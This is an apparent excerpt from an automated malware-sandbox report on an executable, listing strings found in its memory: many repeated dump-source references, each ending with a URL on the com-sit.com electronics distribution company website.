              Source: OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427481646.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.554341024.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.534931678.0000000004610000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.458776196.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.456317870.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581296934.0000000003350000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.577763263.0000000003430000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/impressum/
              Source: OWd39WUX3D.exe, 00000000.00000003.577763263.0000000003430000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/intelligent-sourcing/
              Source: OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427481646.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.554341024.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.534931678.0000000004610000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.458776196.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.456317870.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581296934.0000000003350000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.577763263.0000000003430000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/karriere/
              Source: OWd39WUX3D.exe, 00000000.00000003.577763263.0000000003430000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/kontakt-comsit-distribution-gmbh/
              Source: OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427481646.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.554341024.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.534931678.0000000004610000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.458776196.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.456317870.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581296934.0000000003350000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.577763263.0000000003430000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/logistics/
              Source: OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427481646.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.554341024.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.534931678.0000000004610000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.458776196.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.456317870.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581296934.0000000003350000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.577763263.0000000003430000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/management/
              Source: OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427481646.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.554341024.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.534931678.0000000004610000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.458776196.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.456317870.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581296934.0000000003350000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.577763263.0000000003430000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/marketing/
              Source: OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427481646.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.554341024.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.534931678.0000000004610000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.458776196.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.456317870.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581296934.0000000003350000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.577763263.0000000003430000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/personal-stories/
              Source: OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427481646.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.554341024.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.534931678.0000000004610000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.458776196.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.456317870.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581296934.0000000003350000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.577763263.0000000003430000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/remarking-test/
              Source: OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427481646.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.554341024.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.534931678.0000000004610000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.458776196.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.456317870.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581296934.0000000003350000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.577763263.0000000003430000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/rohs-test/
              Source: OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427481646.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.554341024.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.534931678.0000000004610000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.458776196.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.456317870.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581296934.0000000003350000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.577763263.0000000003430000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/sales/
              Source: OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427481646.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.554341024.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.534931678.0000000004610000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.458776196.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.456317870.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581296934.0000000003350000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.577763263.0000000003430000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/send-us-your-bom/
              Source: OWd39WUX3D.exe, 00000000.00000003.577763263.0000000003430000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/serviceleistungen-loesungen/
              Source: OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427481646.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.554341024.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.534931678.0000000004610000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.458776196.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.456317870.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581296934.0000000003350000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.577763263.0000000003430000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/soldering-test/
              Source: OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427481646.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.554341024.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.534931678.0000000004610000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.458776196.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.456317870.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581296934.0000000003350000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.577763263.0000000003430000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/temptest/
              Source: OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427481646.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.554341024.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.534931678.0000000004610000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.458776196.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.456317870.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581296934.0000000003350000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.577763263.0000000003430000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/testhouse/
              Source: OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427481646.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.554341024.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.534931678.0000000004610000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.458776196.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.456317870.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581296934.0000000003350000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.577763263.0000000003430000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/ueberbestaende/
              Source: OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427481646.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.554341024.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.534931678.0000000004610000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.458776196.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.456317870.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581296934.0000000003350000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.577763263.0000000003430000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/unser-logo/
